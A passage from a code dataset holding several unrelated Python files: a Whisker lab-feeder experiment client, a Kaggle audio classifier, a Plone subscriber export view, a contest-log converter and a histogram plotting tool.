None:\r\n\t\t\tself.loop.stop()\r\n\t\t\tprint(\"Server disconnected. Exiting.\")\r\n\t\telse:\r\n\t\t\tprint(\"Main: '\" + \" \".join(m) + \"'\")\r\n\t\r\n\tdef handle_reply(self, m):\r\n\t\tif m is not None:\r\n\t\t\tself.imm_reply_future.set_result(m)\r\n\r\n\tdef handle_Imm(self, m):\r\n\t\tself.imm_port = int(m[1])\r\n\r\n\t@asyncio.coroutine\r\n\tdef send_message(self, *m):\r\n\t\tif self.imm_reply_future is not None: yield from self.imm_reply_future\r\n\t\tself.imm_reply_future = asyncio.Future()\r\n\t\tprint(\"Sent: '\" + \" \".join(m) + \"'\")\r\n\t\tself.imm_conn.send_message(m)\r\n\t\tresult = yield from self.imm_reply_future\r\n\t\tself.imm_reply_future = None\r\n\t\tprint(\"Reply: '\" + \" \".join(result) + \"'\")\r\n\t\treturn result\r\n\r\n\t@asyncio.coroutine\r\n\tdef handle_Code(self, m):\r\n\t\tself.imm_code = m[1]\r\n\t\tself.imm_conn = WhiskerConnector()\r\n\t\tself.imm_conn.add_handler('*', self.handle_reply)\r\n\t\tprint(self.imm_port)\r\n\t\tyield from self.imm_conn.connect(self.loop, 'localhost', self.imm_port)\r\n\t\tyield from self.send_message('Link', self.imm_code)\r\n\t\tprint(\"Connecting to immediate channel {}:{} with code {}\".format(self.host, self.imm_port, self.imm_code))\r\n\t\tself.imm_conn_future.set_result(True)\r\n#________________________________________________________________________________________________\r\n\r\n\t@asyncio.coroutine\r\n\tdef handle_Event(self, m):\r\n\t\tmessage = m[1]\r\n\t\tif message == 'iti_end':\r\n\t\t\tprint('ITI over')\r\n\t\t\tyield from self.feed(2)\t\t\t\r\n\t\t\r\n\t\telif message == 'iti_start':\r\n\t\t\tprint('iti starting')\r\n\t\t\tyield from self.iti()\r\n\t\t\t\t\t\r\n\t\telif message == 'end':\r\n\t\t#when experiment timer finished, end experiment\r\n\t\t\tself.expt_active = False\r\n\t\t\tself.screen_active = False\r\n\t\t\tyield from client.send_message('TimerClearAllEvents')\r\n\t\t\tyield from client.send_message('DisplayAddObject', 'document', 'done', 'text', '50', '50', 'All Done', '-textcolour', '255', '255', '255')\r\n\t\t\tprint('experiment is over')\r\n\t\tpass\r\n\r\n#________________________________________________________________________________________________\r\n\t@asyncio.coroutine\r\n\tdef iti(self):\r\n\t\titi = random.gauss(30, 2.5)\r\n\t\twhile iti<20 or iti>40 : \r\n\t\t\titi = random.gauss(30, 2.5)\r\n\t\t\tpass\r\n\t\tprint(int(iti))\r\n\t\ttime.sleep(iti)\r\n\t\tyield from client.send_message('TimerSetEvent', '0', '0', 'iti_end')\r\n#________________________________________________________________________________________________\r\n\t@asyncio.coroutine\r\n\tdef feed(self, n):\r\n\t\tyield from client.send_message('LineSetState', 'TrayLight', 'on')\r\n\t\ttime.sleep(1)\r\n\t\tfor x in range(0,n):\r\n\t\t\tyield from client.send_message('LineSetState', 'PelletDispenser', 'on')\r\n\t\t\ttime.sleep(0.5)\r\n\t\t\tyield from client.send_message('LineSetState', 'PelletDispenser', 'off')\r\n\t\t\ttime.sleep(0.5)\r\n\t\t\tpass\r\n\t\ttime.sleep(5)\r\n\t\tyield from client.send_message('LineSetState', 'TrayLight', 'off')\r\n\t\tyield from client.send_message('TimerSetEvent', '0', '0', 'iti_start')\r\n#________________________________________________________________________________________________\r\n\r\n\t@asyncio.coroutine\r\n\tdef start_Expt(self):\r\n\t\t#Start experiment timer\r\n\t\tyield from client.send_message('TimerSetEvent', '3600000', '0', 'end')\r\n\t\tprint('I started the experiment')\r\n\t\t#send message to start iti\r\n\t\tyield from client.send_message('TimerSetEvent', '0', '0', 'iti_start')\r\n\r\n#________________________________________________________________________________________________\r\n\r\nevent_loop = asyncio.get_event_loop()\r\nclient = WhiskerClient(event_loop, 'localhost', port)\r\n\r\n@asyncio.coroutine\r\ndef run():\r\n\t#claim lines - houselight, tray light, pellet dispenser, white noise\r\n\tyield from client.send_message('LineClaim', '56', '-alias', 'HouseLight')\r\n\tyield from client.send_message('LineClaim', '57', '-alias', 'TrayLight')\r\n\tyield from client.send_message('LineClaim', '58', '-alias', 'PelletDispenser')\r\n\tyield from client.send_message('LineClaim', '59', '-alias', 'WhiteNoise')\r\n\t#Group feeder and tray\r\n\tyield from client.send_message('LineSetAlias', 'PelletDispenser', 'Feeder')\r\n\tyield from client.send_message('LineSetAlias', 'TrayLight', 'Feeder')\r\n\t#Initial states - House light on, traylight off, white noise on \r\n\tyield from client.send_message('LineSetState', 'HouseLight', 'on')\r\n\tyield from client.send_message('LineSetState', 'Feeder', 'off')\r\n\tyield from client.send_message('LineSetState', 'WhiteNoise', 'off') #***TURN ON****\r\n\t#Set up display \r\n\tyield from client.send_message('DisplayClaim', '3', '-alias', 'screen')\r\n\tyield from client.send_message('DisplayCreateDocument', 'document')\r\n\tyield from client.send_message('DisplayShowDocument', 'screen', 'document')\r\n\t#draw background/mask\r\n\tyield from client.send_message('DisplayAddObject', 'document', 'mask', 'rectangle', '10', '10', '758', '1014', '-brushsolid', '0', '0', '0')\r\n\t#start experiment\r\n\tyield from client.start_Expt()\r\n\r\nevent_loop.run_until_complete(client.connect())\r\nprint('here')\r\nevent_loop.run_until_complete(run())\r\n\r\ntry:\r\n\tevent_loop.run_forever()\r\nexcept KeyboardInterrupt as e:\r\n\tprint(\" Received Ctrl-C. Exiting.\")\r\n\r\n\r\n","sub_path":"whisker_client_feeder_R4.py","file_name":"whisker_client_feeder_R4.py","file_ext":"py","file_size_in_byte":6187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"174214507","text":"#Kaggle competition\n# THE ACTUAL VIRTUAL.ENV WILL BE USED FOR OTHER DS/AI PROJECT\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.python.keras.preprocessing.sequence import pad_sequences\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\ndata=pd.read_json(\"all/train.json\")\ndata.columns\n\naudios=[k for k in data['audio_embedding']]\nY=np.asanyarray(data['is_turkey'])\n\n\ndef split(data):\n train,test=train_test_split(data,test_size=0.3)\n\n Train_audios = [k for k in train['audio_embedding']]\n Train_Y = np.asanyarray(train['is_turkey'])\n\n Test_audios = [k for k in test['audio_embedding']]\n Test_Y = np.asanyarray(test['is_turkey'])\n\n # CORRECT SHAPE OF AUDIOS\n Train_audios = pad_sequences(Train_audios, maxlen=10)\n Test_audios = pad_sequences(Test_audios, maxlen=10)\n\n # NORMALIZATION\n Train_audios = tf.keras.utils.normalize(Train_audios)\n Test_audios = tf.keras.utils.normalize(Test_audios)\n\n return (Train_audios,Train_Y,Test_audios,Test_Y)\n\nTrain_audios,Train_Y,Test_audios,Test_Y = split(data)\n\n\n\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense,Flatten\n\n\nmodel=Sequential()\nmodel.add(Flatten())\nmodel.add(Dense(128,activation='relu'))\n#model.add(Dense(128,activation='relu'))\nmodel.add(Dense(64,activation='relu'))\n#model.add(Dense(64,activation='relu'))\nmodel.add(Dense(32,activation='relu'))\n#model.add(Dense(32,activation='relu'))\nmodel.add(Dense(1,activation='sigmoid'))\n\n#COMPILE\nmodel.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n\n#LEARNING\nmodel.fit(Train_audios,Train_Y,batch_size=4,epochs=3)\n\nTest_predict=model.predict(Test_audios)\nTest_Y_pred=np.asarray([Test_predict>0.5])\nTest_Y_pred=Test_Y_pred.reshape(Test_Y.shape)\n\nfrom sklearn.metrics import confusion_matrix\n\nconfusion_matrix(Test_Y,Test_Y_pred)\n\n\n\n##### SUBMIT DATA\ntest_data=pd.read_json('all/test.json')\ntest_audio=test_data['audio_embedding']\ntest_audio=pad_sequences(test_audio,maxlen=10)\ntest_audio=tf.keras.utils.normalize(test_audio)\n\ntestpred=model.predict(test_audio)\ntestpred=testpred.reshape(1196)\ntestypred=np.asarray([testpred>0.5])\ntestypred=testypred.reshape(1196)\n\ntest_id=test_data['vid_id']\ntest_res=np.stack( (test_id,testpred))\ntest_res=pd.DataFrame(test_res)\ntest_res=pd.DataFrame.transpose(test_res)\ntest_res.columns=['vid_id','pred']\n\nsub=pd.read_csv('all/sample_submission.csv')\n\nr=pd.merge(test_res,sub,on='vid_id')\n\nr['is_turkey']=np.where(r['pred']>0.5,1,0)\nr1=r.drop('pred',axis=1)\n\nr1.to_csv('res',index=False)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n######################################################################3\ndef extractinfo (data):\n audios=[]\n res=[]\n for i in range(len(data)):\n # info DATA\n tmpsample=data[i]\n Yturkey=tmpsample[\"is_turkey\"]\n id=tmpsample[\"vid_id\"]\n res.append([id,Yturkey])\n\n # audio DATA\n audio=tmpsample[\"audio_embedding\"]\n audios.append(audio)\n return (np.asarray(res),audios)\n\ndatainfo,audios = extractinfo(data)\n\naudio.read()\n\nres=[]\nfor i in range(len(audios)):\n audio_samp=[]\n audio=audios[i]\n for j in range(len(audio)):\n audio_samp.append(audio[j])\n res.append(audio_samp)\n\n\n\n\n\ndef extractaudio (audios) :\n res=[]\n for i in range(len(audios)):\n sample=audios[i]\n sample=np.asarray(sample)\n sample=sample.reshape(sample.shape[0]*sample.shape[1])\n res.append(sample)\n return res\n\naudios=extractaudio(audios)\ntest=np.array(audios)\n\nY_train=datainfo[:,1]\nY_train=Y_train.astype(np.int)\nY_train=Y_train.reshape(1195)\n\nX_train=audios\n\n\n\n\n\n\n##LETS DO SOME NEURALNET\n\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\nmodel=Sequential()\nmodel.add(Dense(512,activation='relu'))\nmodel.add(Dense(1,activation='sigmoid'))\n\nmodel.compile(optimizer='adam',loss='binary_crossentropy', metrics=['accuracy'])\nmodel.fit(X_train,Y_train,batch_size=1)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"269226529","text":"import logging\n\nfrom Products.Five import BrowserView\nfrom Products.CMFCore.utils import getToolByName\n\nfrom Products.minaraad.subscriptions import SubscriptionManager\nfrom Products.minaraad.browser.utils import buildCSV\nfrom Products.minaraad.subscriptions import THEME_FILTERED\nfrom Products.minaraad.subscriptions import SUBSCRIPTIONS_EMAIL\n\nlogger = logging.getLogger('exportsubscribers')\n\n\nclass ExportSubscribersView(BrowserView):\n\n def __init__(self, *args, **kwargs):\n BrowserView.__init__(self, *args, **kwargs)\n tool = getToolByName(self.context, 'portal_url')\n portal = tool.getPortalObject()\n self.sm = SubscriptionManager(portal)\n obj = self.context.aq_explicit\n self.contenttype = obj.__class__.__name__\n\n def __call__(self):\n \"\"\"Return template with form or return csv.\"\"\"\n request = self.request\n if request.get('form.button.ExportEmail', None) is not None:\n return self.buildSubscriberCSV()\n\n return self.index(template_id='export_subscribers')\n\n def show_theme_warning(self):\n \"\"\"A theme field was added to two contenttypes, warn if it is None.\"\"\"\n if self.contenttype in ['Study', 'Advisory']:\n if self.context.getTheme() is None:\n return True\n # In all other cases, no warning is needed.\n return False\n\n def can_email(self):\n return self.contenttype in SUBSCRIPTIONS_EMAIL\n\n def buildSubscriberCSV(self):\n ploneUtils = getToolByName(self.context, 'plone_utils')\n safeSubscriberId = ploneUtils.normalizeString(self.contenttype).lower()\n\n themes = None\n if self.contenttype in THEME_FILTERED:\n themes = self.context.get_all_themes()\n\n subscribers = self.sm.emailSubscribers(self.contenttype,\n themes=themes)\n\n logger.info(\"Exporting cvs for %s subscribers for %s (themes=%r)\",\n len(subscribers), self.contenttype, themes)\n return buildCSV(self.context,\n subscribers,\n filename='%s-subscribers.csv' % safeSubscriberId)\n","sub_path":"src/Products.minaraad/Products/minaraad/browser/subscribers.py","file_name":"subscribers.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"418215137","text":"from json import dumps, load\nfrom os import path, makedirs\n\n\ndef json_input(path):\n with open(path, 'r') as f:\n return load(f)\n\n\n_params = json_input('params.json')\n\ndata_dir = _params['data_dir']\nghosts_file_path = _params['ghosts_file_path']\n\n\ndef json_output(data):\n return dumps(data, sort_keys=False, separators=(',', ':'), ensure_ascii=False)\n\n\ndef output(filename, data):\n with open(path.join(data_dir, filename), 'w') as f:\n f.write(json_output(data))\n\n\ndef ensure_dir(_path):\n if not path.exists(_path):\n makedirs(_path)\n\n\ndef team_out(data):\n teams = {}\n\n for line in data:\n if len(line) < 3 or not (line[1] == 't' and line[2] == ' '):\n continue\n\n team_id = line.split(' ')[1].split(',')[0]\n team_name = line.split(' ')[1].split(',')[3].split('(')[0]\n team_organization = line.split('(')[1].replace(')', '')\n\n team = {}\n team['name'] = team_name\n team['organization'] = team_organization\n team['official'] = 1\n\n teams[team_id] = team\n\n output(\"team.json\", teams)\n\n\ndef run_out(data):\n runs = []\n\n for line in data:\n if len(line) < 3 or not (line[1] == 's' and line[2] == ' '):\n continue\n\n line = line.split(' ')[1]\n line = line.split(',')\n\n team_id = line[0]\n problem_id = ord(line[1]) - ord('A')\n timestamp = line[3]\n status = line[4]\n if status == \"OK\":\n status = \"correct\"\n else:\n status = \"incorrect\"\n\n run = {}\n run[\"team_id\"] = team_id\n run[\"timestamp\"] = int(timestamp) // 60 * 60\n run[\"status\"] = status\n run[\"problem_id\"] = problem_id\n\n runs.append(run)\n\n output(\"run.json\", runs)\n\n\nwith open(ghosts_file_path, 'r', encoding=\"utf-8\") as f:\n data = f.read().split(\"\\n\")\n\nensure_dir(data_dir)\nteam_out(data)\nrun_out(data)\n","sub_path":"spider-examples/cf-ghosts/sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"88579610","text":"#!/usr/bin/env python3\n\"\"\"K. Miernik 2012\nk.a.miernik@gmail.com\nDistributed under GNU General Public Licence v3\n\nThis module is inteded to be loaded in an interactive interpreter session.\nThe ipython is strongly recommended. The pydamm is a python replacement for\nDAMM programm.\n\n\"\"\"\n\nimport math\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport re\n\nfrom collections import deque\n\"\"\"\nfrom Pyspectr import hisfile as hisfile\nfrom Pyspectr import histogram as histogram\nfrom Pyspectr import plotter as plotter\nfrom Pyspectr.exceptions import GeneralError as GeneralError\n\"\"\"\nimport local_hisfile as hisfile\nimport local_histogram as histogram\nimport local_plotter as plotter\nfrom Pyspectr.decay_fitter import DecayFitter as DecayFitter\nfrom Pyspectr.peak_fitter import PeakFitter as PeakFitter\n\n\nclass Plot:\n \"\"\"\n The Plot class holds a set of data and parameters that are needed to\n display the data. \n\n The bin_size attribute defines how much the histogram should be binned\n The norm attribute defines the normalization parameter used\n\n These parameters are altering the display only, the histogram \n always keeps the original data.\n\n If the binned or normalized histogram data are needed for direct\n access, use functions avaible in the Histogram class.\n\n The mode defines the way the data are presented,\n 'histogram' is displayed with steps-mid\n 'function' with continuus line\n 'errorbar' with yerrorbars\n 'map' for 2D histograms\n\n \"\"\"\n\n def __init__(self, histogram, mode, active):\n self.histogram = histogram\n self.mode = mode\n self.active = active\n\n self._bin_size = 1\n self._norm = 1\n\n\n @property\n def bin_size(self):\n return self._bin_size\n\n\n @bin_size.setter\n def bin_size(self, bs):\n if self.histogram.dim != 1:\n raise GeneralError('Currently only 1D histograms can be binned')\n\n if isinstance(bs, int):\n # You can only bin further the histogram, there is no\n # way back (load original data again)\n if bs > self._bin_size:\n self._bin_size = bs\n self.histogram = self.histogram.rebin1d(bs)\n elif bs <= self._bin_size:\n pass\n else:\n raise GeneralError('Attempt to set bin size to {}'.\\\n format(bs))\n else:\n raise GeneralError('Attempt to set bin size to {}'.\\\n format(bs))\n\n\n @property\n def norm(self):\n return self._norm\n\n\n @norm.setter\n def norm(self, n):\n if self.histogram.dim != 1:\n raise GeneralError('Currently only 1D histograms can be normalized')\n self.histogram = self.histogram.normalize1d(n, self.bin_size)\n\n\n\n def __str__(self):\n \"\"\"Basic information Informative string\"\"\"\n string = 'Plot: {} bin {} norm {:.2e}'.\\\n format(self.histogram.title.strip(), self.bin_size,\n self.norm)\n return string\n\n\n def __repr__(self):\n \"\"\"More verbose string\n\n \"\"\"\n string = 'Plot: \"{}\" bin {} norm {:.2e} active {} mode {}'.\\\n format(self.histogram.title.strip(), self.bin_size,\n self.norm, self.active, self.mode)\n return string\n\n\n\nclass Experiment:\n \"\"\"Main class for data visualization and analysis\n\n \"\"\"\n # Deque lengths\n FIFO_1D = 50\n FIFO_2D = 5\n\n # These variables and registers are class wide, so\n # if more than one Experiment is open (one file = one Experiment)\n # they share the registers and auto-scaling is still working\n\n # Keeps current and past 1D plots\n # The right-most item is the current one\n plots = deque(maxlen=FIFO_1D)\n\n # Current and past 2D plots\n maps = deque(maxlen=FIFO_2D)\n\n # 1D plot ranges\n xlim = None\n ylim = None\n\n # 2D plot ranges\n xlim2d = None\n ylim2d = None\n logz = False\n\n # 1 for 1D, 2 for 2D\n _mode = 1\n\n\n def __init__(self, file_name, size=11):\n \"\"\"Initialize, open data file (his) and open plot window\n (size parameter decides on plot dimensions)\n\n \"\"\"\n self.file_name = file_name\n # The current (active) file\n self.hisfile = None\n self.load(file_name)\n\n # Peaks for fitting\n self.peaks = []\n \n # plotter front-end\n self.plotter = plotter.Plotter(size)\n\n\n def load(self, file_name):\n \"\"\"Load his file (also tar gzipped files)\"\"\"\n self.hisfile = hisfile.HisFile(file_name)\n\n\n @property\n def mode(self):\n \"\"\" 1D or 2D plotting mode\"\"\"\n return Experiment._mode\n\n\n @mode.setter\n def mode(self, mode):\n \"\"\"Deactivate all plots that have different mode (dimension)\"\"\"\n if mode not in [1, 2]:\n raise GeneralError('Only 1D and 2D plotting modes are possible')\n\n if mode == 2:\n self.plotter.ylin()\n\n Experiment._mode = mode\n for p in self.plots:\n if p.histogram.dim != mode:\n p.active = False\n\n\n def _replace_latex_chars(self, text):\n \"\"\"Clear text from characters that are not accepted by latex\"\"\"\n replace_chars = [['_', '-'],\n ['$', '\\$'],\n ['%', '\\%'],\n ['~', ' '],\n ['\"', \"''\"],\n ['\\\\', ' ']]\n replaced_text = text\n for r_ch in replace_chars:\n replaced_text = replaced_text.replace(r_ch[0], r_ch[1])\n return replaced_text\n\n\n def show_registers(self):\n \"\"\"Print the available registers\"\"\"\n i = -1\n print('1D histograms')\n print('{: <3} {: ^40} {: ^5} {: ^8} {: ^8}'.\\\n format('i', 'Title', 'Bin', 'Norm', 'Active'))\n print('-' * 79)\n\n for p in reversed(Experiment.plots):\n print('{: >3} {: <40} {: >5} {: >5.2e} {: >5}'.\\\n format(i, p.histogram.title[:40], p.bin_size,\n p.norm, p.active))\n i -= 1\n print()\n\n i = -1\n print('2D histograms')\n print('{: <3} {: ^40} {: ^5} {: ^8} {: ^8}'.\\\n format('i', 'Title', 'Bin', 'Norm', 'Active'))\n print('-' * 79)\n\n for p in reversed(Experiment.maps):\n print('{: >3} {: <40} {: >5} {: >5.2e} {: >5}'.\\\n format(i, p.histogram.title[:40], p.bin_size,\n p.norm, p.active))\n i -= 1\n print()\n\n\n def _expand_norm(self, norm, num_of_args):\n \"\"\"Return normalization array of lenght equal to \n num_of_args, expand integers to whole array, check \n if list is of proper lenght\n\n \"\"\"\n normalization = []\n if isinstance(norm, str):\n if norm.lower() == 'area':\n for i in range(num_of_args):\n normalization.append('area')\n else:\n print(\"Normalization must be a float, \",\n \"list of floats or a 'area' string\")\n return None\n elif isinstance(norm, float) or isinstance(norm, int):\n for i in range(num_of_args):\n normalization.append(norm)\n elif isinstance(norm, list):\n if len(norm) == num_of_args:\n normalization = norm\n else:\n print('List of normalization factors must be of the same' +\n ' length as the list of histograms')\n return None\n else:\n print(\"Normalization must be a float, \",\n \"list of floats or a 'area' string\")\n print(norm, ' was given')\n return None\n return normalization\n\n\n def _expand_bin_sizes(self, bin_size, num_of_args):\n \"\"\"See _expand_norm\"\"\"\n bin_sizes = []\n if isinstance(bin_size, int):\n for i in range(num_of_args):\n bin_sizes.append(bin_size)\n elif isinstance(bin_size, list):\n if len(bin_size) == num_of_args:\n bin_sizes = bin_size\n else:\n print('List of bin sizes must be of the same' +\n ' length as the list of histograms')\n return None\n else:\n print(\"Bin size must be an int or a list of ints\")\n return None\n return bin_sizes\n\n\n def _expand_d_args(self, args):\n \"\"\"Expand list of args to a list of histograms ids or Plot\n instances\"\"\"\n his_list = []\n for his in args:\n if isinstance(his, int):\n his_list.append(his)\n elif isinstance(his, str):\n try:\n his_range = his.split('-')\n his_range = [x for x in range(int(his_range[0]),\n int(his_range[1]) + 1)]\n his_list += his_range\n except (ValueError, IndexError):\n break\n elif isinstance(his, Plot):\n his_list.append(his)\n else:\n break\n else:\n return his_list\n print(\"Histogram list must be given in a 'x-y' format,\",\n \"where x and y are integers\",\n \"(note also quotation marks), e.g. '100-115'\")\n return None\n\n\n\n def d(self, *args, norm=1, bin_size=1, clear=True, linlog='lin'):\n \"\"\"\n Plot 1D histogram. \n * args: is a list of histograms that may be given as:\n - positive integer: is interpreted as the histogram id\n from a currently open file\n - negative integer: is interpreted as the registry number\n (see (show_registers())\n - Plot object: see Plot class\n - string: in 'x-y' format where x and y are integers \n (note also mandatory quatation marks)\n is interpreted as a range of histograms ids\n\n * norm: may be given as a single float or int value or an 'area' string,\n also a list of length matching the *args list may be used\n with any combination of the above accepted values\n * bin_size: must be an integer, a list of ints is \n also accepted (see norm)\n * clear: is True by default, which means that previous plot is \n cleared if False is given, the previous plots are not cleared.\n\n Example:\n e.d(100, plot1, '105-106', -3, bin_size=[1, 2, 1, 1, 10], clear=False)\n\n \"\"\"\n plots = []\n\n his_list = self._expand_d_args(args)\n\n normalization = self._expand_norm(norm, len(his_list))\n if normalization is None:\n return None\n\n bin_sizes = self._expand_bin_sizes(bin_size, len(his_list))\n if bin_sizes is None:\n return None\n\n # Clear the plotting area (of clear is False, the currently\n # active plots are not deactivated, so they got replotted at\n # the end of this function)\n self.plotter.clear()\n\n # Switch mode to 1D\n self.mode = 1\n # Deactivate current plots if clear flag is used\n if clear:\n for p in Experiment.plots:\n p.active = False\n\n # Prepare data for plotting\n for i_plot, his in enumerate(his_list):\n if isinstance(his, int):\n # load histograms from the file\n if his > 0:\n data = self.hisfile.load_histogram(his)\n if data[0] != 1:\n print('{} is not a 1D histogram'.format(his))\n return None\n title = self.hisfile.histograms[his]['title'].strip()\n title = '{}:{}'.format(his, \n self._replace_latex_chars(title))\n histo = histogram.Histogram()\n histo.title = title\n histo.x_axis = data[1]\n histo.weights = data[3]\n histo.errors = self._standard_errors_array(data[3])\n plot = Plot(histo, 'histogram', True)\n plot.bin_size = bin_sizes[i_plot]\n plot.norm = normalization[i_plot]\n plots.append(plot)\n Experiment.plots.append(plot)\n else:\n # plot histograms from registry\n # Numbered by negative numbers (-1 being the latest)\n # Call show_registers for a list of available plots\n try:\n plot = Experiment.plots[his]\n Experiment.plots[his].active = True\n Experiment.plots[his].bin_size = bin_sizes[i_plot]\n Experiment.plots[his].norm = normalization[i_plot]\n except IndexError:\n print('There is no plot in the registry under the',\n 'number', his, 'use show_registry() to see',\n 'available plots')\n return None\n plots.append(plot)\n elif isinstance(his, Plot):\n # If instance of Plot class is given, mark it active and add\n # to the deque (if not already there)\n # and to the array to be returned at the end\n his.active = True\n his.bin_size = bin_sizes[i_plot]\n his.norm = normalization[i_plot]\n plots.append(his)\n if his not in Experiment.plots:\n Experiment.plots.append(his)\n\n # Count the number of active plots\n active_plots = 0\n for plot in Experiment.plots:\n if plot.active:\n active_plots += 1\n\n # Here the actual plotting happens\n i_plot = 0\n for plot in Experiment.plots:\n if plot.active:\n i_plot += 1\n # If ylim is not given explicitely, go through the\n # active plots to find the plot limits\n # This is run only for the last plot.\n # Note that this is neccesary as matplotlib is not\n # autoscaling Y axis when \n # changing the X axis is being changed\n # If, in a future, the behaviour of matplotlib\n # changes, this part may dropped\n ylim = None\n if self.ylim is None and i_plot == active_plots:\n ylim = self._auto_scale_y()\n else:\n ylim = self.ylim\n\n # Note that ylim is autoscaled above if self.ylim is None\n # But we still keep self.ylim None, \n # to indicate autoscaling\n self.plotter.plot1d(plot, Experiment.xlim, ylim)\n if linlog=='lin':\n self.lin()\n else:\n self.log()\n\n # Return plots that were added or activated\n return plots\n\n\n def _auto_scale_y(self):\n \"\"\"Find the y limits taking into account all active plots \"\"\"\n ylim = [None, None]\n for p in Experiment.plots:\n if p.active:\t\n histo = p.histogram\n #if p.bin_size > 1:\n #histo = histo.rebin1d(p.bin_size)\n #if p.norm != 1:\n #histo = histo.normalize1d(p.norm, p.bin_size)\n if Experiment.ylim is None:\n #if Experiment.xlim is None: ORIGINAL----> TYPO, SHOULD BE YLIM NOT XLIM\n ymin = min(histo.weights)\n ymax = max(histo.weights[1:])\n #ORIGINAL IS BELOW, THE ZEROTH POSITION IS FULL OF ZEROS AND SKEWS THE AXIS WAY UP\n #ymax = max(histo.weights)\n else:\n i_xmin = Experiment.xlim[0] // p.bin_size - 1\n if i_xmin < 0:\n i_xmin = 0\n i_xmax = Experiment.xlim[1] // p.bin_size + 1\n try:\n ymin = min(histo.weights[i_xmin:i_xmax])\n except ValueError:\n ymin = None\n try:\n ymax = max(histo.weights[i_xmin:i_xmax])\n except ValueError:\n ymax = None\n if ymin is not None:\n if ylim[0] is not None:\n if ymin < ylim[0]:\n ylim[0] = ymin\n else:\n ylim[0] = ymin\n if ymax is not None:\n if ylim[1] is not None:\n if ymax > ylim[1]:\n ylim[1] = ymax\n else:\n ylim[1] = ymax\n if ylim[0] is None or ylim[1] is None:\n return None\n else:\n #return [ylim[0] - ylim[0] * 0.1, ylim[1] + ylim[1] * 0.1]\n return [ylim[0] - ylim[0], ylim[1] + (0.1*ylim[1])]\n\n\n def _auto_scale_x(self):\n \"\"\"Find the x axis limits taking into account all active plots.\"\"\"\n xlim = [None, None]\n for p in Experiment.plots:\n if p.active:\n histo = p.histogram\n if Experiment.xlim is None:\n xmin = histo.x_axis[0]\n xmax = histo.x_axis[-1]\n if xlim[0] is not None:\n if xmin < xlim[0]:\n xlim[0] = xmin\n else:\n xlim[0] = xmin\n if xlim[1] is not None:\n if xmax > xlim[1]:\n xlim[1] = xmax\n else:\n xlim[1] = xmax\n\n if xlim[0] is None or xlim[1] is None:\n return None\n else:\n return xlim\n\n\n def dl(self, x0=None, x1=None):\n \"\"\"Change x range of 1D histogram\"\"\"\n if self.mode != 1:\n return None\n\n if x0 is None or x1 is None:\n Experiment.xlim = None\n self.plotter.xlim(self._auto_scale_x())\n else:\n Experiment.xlim = (x0, x1)\n self.plotter.xlim(Experiment.xlim)\n\n if self.ylim is None:\n self.plotter.ylim(self._auto_scale_y())\n\n\n def dmm(self, y0=None, y1=None):\n \"\"\"Change yrange of 1D histogram \"\"\"\n if self.mode != 1:\n return None\n\n if y0 is None or y1 is None:\n self.ylim = None\n else:\n self.ylim = (y0, y1)\n\n if self.ylim is None:\n self.plotter.ylim(self._auto_scale_y())\n else:\n self.plotter.ylim(self.ylim)\n\n\n def log(self):\n \"\"\"Change y scale to log or z scale to log\"\"\"\n if self.mode == 1:\n self.plotter.ylog()\n self.dl()\n elif self.mode == 2:\n Experiment.logz = True\n self.dd(-1, xc=Experiment.xlim2d, yc=Experiment.ylim2d)\n\n def lin(self):\n \"\"\"Change y scale to linear or z scale to linear\"\"\"\n if self.mode == 1:\n self.plotter.ylin()\n self.dl()\n if self.mode == 2:\n Experiment.logz = False\n self.dd(-1, xc=Experiment.xlim2d, yc=Experiment.ylim2d)\n\n\n def list(self, his_id=None):\n \"\"\"List all histograms in the active data file\n or details on a selected histogram. Now accepts '1d','1D','2d',\n or '2D' as input for listing all 1 or 2 dimensional histograms. \n Now also implements re to query the list (case insensitive)\"\"\"\n if his_id is None:\n for key in sorted(self.hisfile.histograms.keys()):\n print('{: <6} {}'.format(key, \n self.hisfile.histograms[key]['title']))\n elif isinstance(his_id, str):\n if his_id is '1d' or his_id is'1D':\n for key in sorted(self.hisfile.histograms.keys()):\n if self.hisfile.histograms[key]['dimension']==1:\n print('{: <6} {}'.format(key, \n self.hisfile.histograms[key]['title']))\n elif his_id is '2d' or his_id is'2D':\n for key in sorted(self.hisfile.histograms.keys()):\n if self.hisfile.histograms[key]['dimension']==2:\n print('{: <6} {}'.format(key, \n self.hisfile.histograms[key]['title']))\n else:\n for key in sorted(self.hisfile.histograms.keys()):\n if re.search(his_id,self.hisfile.histograms[key]['title'],re.I)!=None:\n print('{: <6} {}'.format(key, \n self.hisfile.histograms[key]['title']))\n else:\n try:\n dim = self.hisfile.histograms[his_id]['dimension']\n xmin = []\n xmax = []\n for i in range(dim):\n xmin.append(self.hisfile.histograms[his_id]['minc'][0])\n xmax.append(self.hisfile.histograms[his_id]['maxc'][0])\n print('{: <10} : {}'.format('ID', his_id))\n print('{: <10} : {}'.format('Title', \n self.hisfile.histograms[his_id]['title']))\n print('{: <10} : {}'.format('Dimensions', dim))\n print('{: <10} : ({}, {})'.format('X range', xmin[0], xmax[0]))\n if dim > 1:\n print('{: <10} : ({}, {})'.format('Y range', \n xmin[1], xmax[1]))\n except KeyError:\n print('Histogram id = {} not found'.format(his_id))\n\n def _standard_errors_array(self, data):\n \"\"\" Calculate standard error array (\\sigma_i = \\sqrt{n_i}),\n with a twist: if n_i = 0, the uncertainity is 1 (not 0)\n\n \"\"\"\n errors = np.zeros(data.shape)\n for index, d in np.ndenumerate(data):\n if d == 0:\n errors[index] = 1\n else:\n errors[index] = 